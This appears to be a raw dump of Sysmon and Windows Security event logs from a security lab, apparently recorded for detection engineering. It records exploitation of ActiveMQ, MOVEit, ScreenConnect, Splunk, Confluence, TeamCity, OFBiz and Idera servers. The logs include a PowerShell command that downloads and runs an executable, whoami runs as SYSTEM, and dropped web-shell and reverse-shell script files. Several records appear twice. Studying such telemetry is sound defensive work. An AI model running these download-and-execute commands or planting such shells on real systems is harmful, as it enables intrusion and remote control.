1 5 4 1 0 0x8000000000000000 18061 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-11-09 15:25:26.081 BD1BA16A-F9E6-654C-7624-000000000F00 2796 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd /c "powershell Invoke-WebRequest "http://192.168.196.163/test.exe" -OutFile "test.exe"; Start-Process "./test.exe"" C:\Users\dadam\Desktop\apache-activemq-5.17.2-bin\apache-activemq-5.17.2\bin\win64\ SNAPATTACK\snapattack BD1BA16A-F63C-654C-F37D-C10300000000 0x3c17df3 2 High MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-F9BF-654C-7424-000000000F00 12284 C:\Program Files\Java\jdk-17\bin\java.exe "C:\\Program Files\\Java\\jdk-17\\bin\\java.exe" -Dactivemq.home=../.. -Dactivemq.base=../.. -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.trustStorePassword=password -Djavax.net.ssl.keyStore=../../conf/broker.ks -Djavax.net.ssl.trustStore=../../conf/broker.ts -Dcom.sun.management.jmxremote -Dorg.apache.activemq.UseDedicatedTaskRunner=false -Djava.util.logging.config.file=logging.properties -Dactivemq.conf=../../conf -Dactivemq.data=../../data -Djava.security.auth.login.config=../../conf/login.config -Xms1024m -Xmx1024m -Djava.library.path=../../bin/win64 -classpath ../../bin/wrapper.jar;../../bin/activemq.jar -Dwrapper.key=3DCHrLeAtQB8j2 -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=10680 -Dwrapper.version=3.2.3 -Dwrapper.native_library=wrapper -Dwrapper.cpu.timeout=10 -Dwrapper.jvmid=1 org.tanukisoftware.wrapper.WrapperSimpleApp org.apache.activemq.console.Main start SNAPATTACK\snapattack 1 5 4 1 0 0x8000000000000000 11921 Microsoft-Windows-Sysmon/Operational WIN-BM5RC4SJEO0.snapattack.labs - 2023-06-07 18:35:30.474 977D2910-CDF2-6480-1009-000000000600 6824 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 4.6.1586.0 built by: NETFXREL2 Visual C# Command Line Compiler Microsoft® .NET Framework Microsoft Corporation csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\9a11d1d0\5debd404\4luzrauo.cmdline" c:\windows\system32\inetsrv\ WIN-BM5RC4SJEO0\moveitsvc 977D2910-CDEB-6480-873C-170000000000 0x173c87 0 High MD5=5E54697BC7C52B60E9CAD6FA21FEF37F,SHA256=70B537332510EF6EA17B61E5941A6600CAF773DC2CD982F5CA70DE795574A8D1,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52 977D2910-CDEB-6480-0F09-000000000600 8100 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "moveitdmz pool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmd1f57f95-e592-4e60-8f3c-b2fae15cb57e -h "C:\inetpub\temp\apppools\moveitdmz pool\moveitdmz pool.config" -w "" -m 0 -t 20 -ta 0 WIN-BM5RC4SJEO0\moveitsvc 1 5 4 1 0 0x8000000000000000 19520 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-08-17 18:41:53.825 BD1BA16A-69F1-64DE-1606-000000001700 7936 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /c "whoami > c:\Users\Public\whoami.txt" C:\Program Files\Idera Server Backup\ NT AUTHORITY\SYSTEM BD1BA16A-5010-64DE-E703-000000000000 0x3e7 0 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-5016-64DE-5B00-000000001700 2384 C:\Program Files\Idera Server Backup\jre\launch4j-tmp\cdpserver.exe "C:\Program Files\Idera Server Backup\bin\..\jre\\launch4j-tmp\cdpserver.exe" -Dconfig.path=.\conf\server.properties -Dinstall.dir=.. -Dconfig.dir=.\conf -server -Dactivation.server.hostname=activation.r1soft.com -XX:-UseGCOverheadLimit -XX:MaxPermSize=256m -XX:+DisableExplicitGC -ea -Dweb.home=. -Dtrial.key.type=advanced -Dvelocity.dir=.\conf\templates -XX:+HeapDumpOnOutOfMemoryError -Xms128m -Xmx512m -Djava.library.path=".\dll;.\lib" -Dwrapper.key="jLLh3r8lWCz3Rfqd" -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=3424 -Dwrapper.version="3.2.0" -Dwrapper.native_library="wrapper" -Dwrapper.service="TRUE" -Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1 -classpath "C:\Program Files\Idera Server Backup\bin\cdpserver.exe;.\conf;.\lib;.\lib\activation-1.1.jar;.\lib\activemq-core-5.5.1.jar;.\lib\annotations-api.jar;.\lib\ant.jar;.\lib\antlr-2.7.6.jar;.\lib\asm-attrs.jar;.\lib\asm.jar;.\lib\aspectjrt.jar;.\lib\bcprov-jdk16-140.jar;.\lib\bsh.jar;.\lib\c3p0-0.9.1.jar;.\lib\cal.jar;.\lib\catalina.jar;.\lib\cglib.jar;.\lib\commons-beanutils-1.7.0.jar;.\lib\commons-cli-1.0-beta-2-dev.jar;.\lib\commons-codec-1.3.jar;.\lib\commons-collections-3.2.1.jar;.\lib\commons-compress-1.1.jar;.\lib\commons-dbcp-1.2.1.jar;.\lib\commons-digester-1.8.jar;.\lib\commons-discovery-0.4.jar;.\lib\commons-fileupload.jar;.\lib\commons-io.jar;.\lib\commons-lang-2.4.jar;.\lib\commons-logging-1.1.1.jar;.\lib\commons-pool-1.2.jar;.\lib\crypto.jar;.\lib\cxf-2.2.9.jar;.\lib\derby.jar;.\lib\derbytools.jar;.\lib\dom4j-1.6.1.jar;.\lib\el-api.jar;.\lib\fastutil-6.4.4.jar;.\lib\geronimo-j2ee-management_1.1_spec-1.0.1.jar;.\lib\geronimo-jaxws_2.1_spec-1.0.jar;.\lib\geronimo-jms_1.1_spec-1.1.1.jar;.\lib\geronimo-jta_1.0.1B_spec-1.0.1.jar;.\lib\geronimo-stax-api_1.0_spec-1.0.1.jar;.\lib\geronimo-ws-metadata_2.0_spec-1.1.2.jar;.\lib\hibernate-jpa-2.0-api.jar;.\lib\hibernate-validator.jar;.\lib\hibernate3.jar;.\lib\i18nlog-1.0.9.jar;.\lib\jakarta-regexp-1.5.jar;.\lib\jasper-el.jar;.\lib\jasper-jdt.jar;.\lib\jasper.jar;.\lib\javassist.jar;.\lib\jaxb-api-2.1.jar;.\lib\jaxb-impl-2.1.13.jar;.\lib\jboss-common.jar;.\lib\jcifs-1.3.17.jar;.\lib\jetty-6.1.22.jar;.\lib\jetty-annotations-6.1.22.jar;.\lib\jetty-naming-6.1.22.jar;.\lib\jetty-plus-6.1.22.jar;.\lib\jetty-util-6.1.22.jar;.\lib\joda-time-2.1.jar;.\lib\jsr311-api-1.1.1.jar;.\lib\jta-1.1.jar;.\lib\kahadb-5.5.jar;.\lib\log4j-1.2.15.jar;.\lib\mail-1.4.jar;.\lib\mail.jar;.\lib\mockito-all-1.8.5.jar;.\lib\native.jar;.\lib\neethi-2.0.4.jar;.\lib\org.springframework.binding-2.0.8.RELEASE.jar;.\lib\org.springframework.js-2.0.8.RELEASE.jar;.\lib\quartz.jar;.\lib\r1db.jar;.\lib\saaj-api-1.3.jar;.\lib\saaj-impl-1.3.2.jar;.\lib\servlet-api-2.5-6.1.7.jar;.\lib\servlet-api.jar;.\lib\slf4j-api.jar;.\lib\slf4j-log4j.jar;.\lib\spring-aspects.jar;.\lib\spring-jms-2.5.6.jar;.\lib\spring-security-acl-2.0.5.RELEASE.jar;.\lib\spring-security-core-2.0.5.RELEASE.jar;.\lib\spring-security-core-tiger-2.0.5.RELEASE.jar;.\lib\spring-security-taglibs-2.0.5.RELEASE.jar;.\lib\spring.jar;.\lib\tomcat-coyote.jar;.\lib\tomcat-dbcp.jar;.\lib\tomcat-juli.jar;.\lib\truezip-6.8.1.jar;.\lib\velocity-1.5.jar;.\lib\velocity-dep-1.5.jar;.\lib\wrapper.jar;.\lib\ws-commons-util-1.0.1.jar;.\lib\wsdl4j-1.6.2.jar;.\lib\wss4j-1.5.8.jar;.\lib\wstx-asl-3.2.9.jar;.\lib\xalan-2.6.0.jar;.\lib\xbean-spring-2.8.jar;.\lib\xml-resolver-1.2.jar;.\lib\xmlrpc-client-3.0rc1.jar;.\lib\xmlrpc-common-3.0rc1.jar;.\lib\XmlSchema-1.4.5.jar;.\lib\xmlsec-1.2.1.jar" com.r1soft.backup.server.BUServerWrapper NT AUTHORITY\SYSTEM 22 5 4 22 0 0x8000000000000000 22373 Microsoft-Windows-Sysmon/Operational DC01.snapattack.labs - 2025-01-09 17:17:23.120 A5CDDB11-0401-6780-0C00-000000000B00 652 _ldap._tcp.dc._msdcs.safebreachlabs.pro. 0 type: 33 sbattacker; C:\Windows\System32\lsass.exe NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 34757 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-02-21 20:30:04.319 BD1BA16A-32B8-65D6-D527-000000001400 836 C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe C:\Program Files (x86)\ScreenConnect\App_Extensions\ylzfxmmf.ashx 2024-02-21 20:30:04.319 NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 2981 Microsoft-Windows-Sysmon/Operational server.snapattack.labs - 2023-12-11 18:24:49.830 D52145E4-49F1-6577-4B00-000000000E00 3188 C:\Program Files\Splunk\bin\splunkd.exe C:\Program Files\Splunk\var\run\splunk\dispatch\1702319089.26\shell.xsl 2023-12-11 18:24:49.830 NT AUTHORITY\SYSTEM 1 5 4 1 0 0x8000000000000000 1254 Microsoft-Windows-Sysmon/Operational EC2AMAZ-2RSGUKB - 2023-12-29 16:34:38.311 BA130F33-F51E-658E-C60B-000000009502 7876 C:\Windows\SysWOW64\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation CALC.EXE calc C:\Users\user\Downloads\apache-ofbiz-18.12.08\apache-ofbiz-18.12.08\ EC2AMAZ-2RSGUKB\user BA130F33-EB3D-658E-34AA-030000000000 0x3aa34 2 High MD5=60FF7F830695B46E4E978968D9A995FE,SHA256=381A38D6E7A146B99E2BE866B9E95FFE31F0DCFCEC62272C7C0D6B7114C9227F,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A BA130F33-F3A5-658E-E906-000000009502 6020 C:\Program Files (x86)\Eclipse Adoptium\jdk-8.0.392.8-hotspot\bin\java.exe "C:\Program Files (x86)\Eclipse Adoptium\jdk-8.0.392.8-hotspot\bin\java.exe" -Djdk.serialFilter=maxarray=100000;maxdepth=20;maxrefs=1000;maxbytes=500000 -Xms128M -Xmx1024M -Dfile.encoding=windows-1252 -Duser.country=US -Duser.language=en -Duser.variant -cp C:\Users\user\Downloads\apache-ofbiz-18.12.08\apache-ofbiz-18.12.08\build\libs\ofbiz.jar org.apache.ofbiz.base.start.Start EC2AMAZ-2RSGUKB\user 1 5 4 1 0 0x8000000000000000 48985 Microsoft-Windows-Sysmon/Operational MXS01.snapattack.local - 2022-05-03 18:39:20.082 157BFC03-76D8-6271-4028-000000000900 26424 C:\Windows\System32\whoami.exe 10.0.14393.0 (rs1_release.160715-1616) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami c:\windows\system32\inetsrv\ NT AUTHORITY\SYSTEM 157BFC03-4690-6271-E703-000000000000 0x3e7 0 System MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9 157BFC03-76D8-6271-3E28-000000000900 19144 C:\Windows\System32\cmd.exe "cmd.exe" /c whoami NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 6126 Microsoft-Windows-Sysmon/Operational server.snapattack.labs - 2024-01-23 15:53:25.703 D52145E4-E0F5-65AF-A60D-000000000B00 10136 C:\Windows\SYSTEM32\curl.exe C:\Program Files\Atlassian\Confluence\mini-reverse.ps1 2024-01-23 15:53:25.702 NT AUTHORITY\NETWORK SERVICE 1 5 4 1 0 0x8000000000000000 34820 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-02-21 20:30:15.612 BD1BA16A-5D57-65D6-FB32-000000001400 11320 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "cmd.exe" /c whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM BD1BA16A-709F-65CE-E703-000000000000 0x3e7 0 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-32B8-65D6-D527-000000001400 836 C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe "C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe" NT AUTHORITY\SYSTEM 4688 2 0 13312 0 0x8020000000000000 103244 Security server.snapattack.labs S-1-5-18 SERVER$ SNAPATTACK 0x3e7 0x1728 C:\TeamCity\jre\bin\java.exe %%1936 0x1460 c:\TeamCity\jre\bin\java.exe -classpath C:\Windows\TEMP\~spawn5413030552937782312.tmp.dir YtnERCQyHb.Payload S-1-0-0 - - 0x0 C:\TeamCity\jre\bin\java.exe S-1-16-16384 1 5 4 1 0 0x8000000000000000 18061 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-11-09 15:25:26.081 BD1BA16A-F9E6-654C-7624-000000000F00 2796 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd /c "powershell Invoke-WebRequest "http://192.168.196.163/test.exe" -OutFile "test.exe"; Start-Process "./test.exe"" C:\Users\dadam\Desktop\apache-activemq-5.17.2-bin\apache-activemq-5.17.2\bin\win64\ SNAPATTACK\snapattack BD1BA16A-F63C-654C-F37D-C10300000000 0x3c17df3 2 High MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-F9BF-654C-7424-000000000F00 12284 C:\Program Files\Java\jdk-17\bin\java.exe "C:\\Program Files\\Java\\jdk-17\\bin\\java.exe" -Dactivemq.home=../.. -Dactivemq.base=../.. -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.trustStorePassword=password -Djavax.net.ssl.keyStore=../../conf/broker.ks -Djavax.net.ssl.trustStore=../../conf/broker.ts -Dcom.sun.management.jmxremote -Dorg.apache.activemq.UseDedicatedTaskRunner=false -Djava.util.logging.config.file=logging.properties -Dactivemq.conf=../../conf -Dactivemq.data=../../data -Djava.security.auth.login.config=../../conf/login.config -Xms1024m -Xmx1024m -Djava.library.path=../../bin/win64 -classpath ../../bin/wrapper.jar;../../bin/activemq.jar -Dwrapper.key=3DCHrLeAtQB8j2 -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=10680 -Dwrapper.version=3.2.3 -Dwrapper.native_library=wrapper -Dwrapper.cpu.timeout=10 -Dwrapper.jvmid=1 org.tanukisoftware.wrapper.WrapperSimpleApp org.apache.activemq.console.Main start SNAPATTACK\snapattack 1 5 4 1 0 0x8000000000000000 11921 Microsoft-Windows-Sysmon/Operational WIN-BM5RC4SJEO0.snapattack.labs - 2023-06-07 18:35:30.474 977D2910-CDF2-6480-1009-000000000600 6824 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 4.6.1586.0 built by: NETFXREL2 Visual C# Command Line Compiler Microsoft® .NET Framework Microsoft Corporation csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\9a11d1d0\5debd404\4luzrauo.cmdline" c:\windows\system32\inetsrv\ WIN-BM5RC4SJEO0\moveitsvc 977D2910-CDEB-6480-873C-170000000000 0x173c87 0 High MD5=5E54697BC7C52B60E9CAD6FA21FEF37F,SHA256=70B537332510EF6EA17B61E5941A6600CAF773DC2CD982F5CA70DE795574A8D1,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52 977D2910-CDEB-6480-0F09-000000000600 8100 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "moveitdmz pool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmd1f57f95-e592-4e60-8f3c-b2fae15cb57e -h "C:\inetpub\temp\apppools\moveitdmz pool\moveitdmz pool.config" -w "" -m 0 -t 20 -ta 0 WIN-BM5RC4SJEO0\moveitsvc 1 5 4 1 0 0x8000000000000000 19520 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-08-17 18:41:53.825 BD1BA16A-69F1-64DE-1606-000000001700 7936 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /c "whoami > c:\Users\Public\whoami.txt" C:\Program Files\Idera Server Backup\ NT AUTHORITY\SYSTEM BD1BA16A-5010-64DE-E703-000000000000 0x3e7 0 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-5016-64DE-5B00-000000001700 2384 C:\Program Files\Idera Server Backup\jre\launch4j-tmp\cdpserver.exe "C:\Program Files\Idera Server Backup\bin\..\jre\\launch4j-tmp\cdpserver.exe" -Dconfig.path=.\conf\server.properties -Dinstall.dir=.. -Dconfig.dir=.\conf -server -Dactivation.server.hostname=activation.r1soft.com -XX:-UseGCOverheadLimit -XX:MaxPermSize=256m -XX:+DisableExplicitGC -ea -Dweb.home=. -Dtrial.key.type=advanced -Dvelocity.dir=.\conf\templates -XX:+HeapDumpOnOutOfMemoryError -Xms128m -Xmx512m -Djava.library.path=".\dll;.\lib" -Dwrapper.key="jLLh3r8lWCz3Rfqd" -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=3424 -Dwrapper.version="3.2.0" -Dwrapper.native_library="wrapper" -Dwrapper.service="TRUE" -Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1 -classpath "C:\Program Files\Idera Server Backup\bin\cdpserver.exe;.\conf;.\lib;.\lib\activation-1.1.jar;.\lib\activemq-core-5.5.1.jar;.\lib\annotations-api.jar;.\lib\ant.jar;.\lib\antlr-2.7.6.jar;.\lib\asm-attrs.jar;.\lib\asm.jar;.\lib\aspectjrt.jar;.\lib\bcprov-jdk16-140.jar;.\lib\bsh.jar;.\lib\c3p0-0.9.1.jar;.\lib\cal.jar;.\lib\catalina.jar;.\lib\cglib.jar;.\lib\commons-beanutils-1.7.0.jar;.\lib\commons-cli-1.0-beta-2-dev.jar;.\lib\commons-codec-1.3.jar;.\lib\commons-collections-3.2.1.jar;.\lib\commons-compress-1.1.jar;.\lib\commons-dbcp-1.2.1.jar;.\lib\commons-digester-1.8.jar;.\lib\commons-discovery-0.4.jar;.\lib\commons-fileupload.jar;.\lib\commons-io.jar;.\lib\commons-lang-2.4.jar;.\lib\commons-logging-1.1.1.jar;.\lib\commons-pool-1.2.jar;.\lib\crypto.jar;.\lib\cxf-2.2.9.jar;.\lib\derby.jar;.\lib\derbytools.jar;.\lib\dom4j-1.6.1.jar;.\lib\el-api.jar;.\lib\fastutil-6.4.4.jar;.\lib\geronimo-j2ee-management_1.1_spec-1.0.1.jar;.\lib\geronimo-jaxws_2.1_spec-1.0.jar;.\lib\geronimo-jms_1.1_spec-1.1.1.jar;.\lib\geronimo-jta_1.0.1B_spec-1.0.1.jar;.\lib\geronimo-stax-api_1.0_spec-1.0.1.jar;.\lib\geronimo-ws-metadata_2.0_spec-1.1.2.jar;.\lib\hibernate-jpa-2.0-api.jar;.\lib\hibernate-validator.jar;.\lib\hibernate3.jar;.\lib\i18nlog-1.0.9.jar;.\lib\jakarta-regexp-1.5.jar;.\lib\jasper-el.jar;.\lib\jasper-jdt.jar;.\lib\jasper.jar;.\lib\javassist.jar;.\lib\jaxb-api-2.1.jar;.\lib\jaxb-impl-2.1.13.jar;.\lib\jboss-common.jar;.\lib\jcifs-1.3.17.jar;.\lib\jetty-6.1.22.jar;.\lib\jetty-annotations-6.1.22.jar;.\lib\jetty-naming-6.1.22.jar;.\lib\jetty-plus-6.1.22.jar;.\lib\jetty-util-6.1.22.jar;.\lib\joda-time-2.1.jar;.\lib\jsr311-api-1.1.1.jar;.\lib\jta-1.1.jar;.\lib\kahadb-5.5.jar;.\lib\log4j-1.2.15.jar;.\lib\mail-1.4.jar;.\lib\mail.jar;.\lib\mockito-all-1.8.5.jar;.\lib\native.jar;.\lib\neethi-2.0.4.jar;.\lib\org.springframework.binding-2.0.8.RELEASE.jar;.\lib\org.springframework.js-2.0.8.RELEASE.jar;.\lib\quartz.jar;.\lib\r1db.jar;.\lib\saaj-api-1.3.jar;.\lib\saaj-impl-1.3.2.jar;.\lib\servlet-api-2.5-6.1.7.jar;.\lib\servlet-api.jar;.\lib\slf4j-api.jar;.\lib\slf4j-log4j.jar;.\lib\spring-aspects.jar;.\lib\spring-jms-2.5.6.jar;.\lib\spring-security-acl-2.0.5.RELEASE.jar;.\lib\spring-security-core-2.0.5.RELEASE.jar;.\lib\spring-security-core-tiger-2.0.5.RELEASE.jar;.\lib\spring-security-taglibs-2.0.5.RELEASE.jar;.\lib\spring.jar;.\lib\tomcat-coyote.jar;.\lib\tomcat-dbcp.jar;.\lib\tomcat-juli.jar;.\lib\truezip-6.8.1.jar;.\lib\velocity-1.5.jar;.\lib\velocity-dep-1.5.jar;.\lib\wrapper.jar;.\lib\ws-commons-util-1.0.1.jar;.\lib\wsdl4j-1.6.2.jar;.\lib\wss4j-1.5.8.jar;.\lib\wstx-asl-3.2.9.jar;.\lib\xalan-2.6.0.jar;.\lib\xbean-spring-2.8.jar;.\lib\xml-resolver-1.2.jar;.\lib\xmlrpc-client-3.0rc1.jar;.\lib\xmlrpc-common-3.0rc1.jar;.\lib\XmlSchema-1.4.5.jar;.\lib\xmlsec-1.2.1.jar" com.r1soft.backup.server.BUServerWrapper NT AUTHORITY\SYSTEM 22 5 4 22 0 0x8000000000000000 22373 Microsoft-Windows-Sysmon/Operational DC01.snapattack.labs - 2025-01-09 17:17:23.120 A5CDDB11-0401-6780-0C00-000000000B00 652 _ldap._tcp.dc._msdcs.safebreachlabs.pro. 0 type: 33 sbattacker; C:\Windows\System32\lsass.exe NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 34757 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-02-21 20:30:04.319 BD1BA16A-32B8-65D6-D527-000000001400 836 C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe C:\Program Files (x86)\ScreenConnect\App_Extensions\ylzfxmmf.ashx 2024-02-21 20:30:04.319 NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 2981 Microsoft-Windows-Sysmon/Operational server.snapattack.labs - 2023-12-11 18:24:49.830 D52145E4-49F1-6577-4B00-000000000E00 3188 C:\Program Files\Splunk\bin\splunkd.exe C:\Program Files\Splunk\var\run\splunk\dispatch\1702319089.26\shell.xsl 2023-12-11 18:24:49.830 NT AUTHORITY\SYSTEM 1 5 4 1 0 0x8000000000000000 34820 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-02-21 20:30:15.612 BD1BA16A-5D57-65D6-FB32-000000001400 11320 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "cmd.exe" /c whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM BD1BA16A-709F-65CE-E703-000000000000 0x3e7 0 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-32B8-65D6-D527-000000001400 836 C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe "C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe" NT AUTHORITY\SYSTEM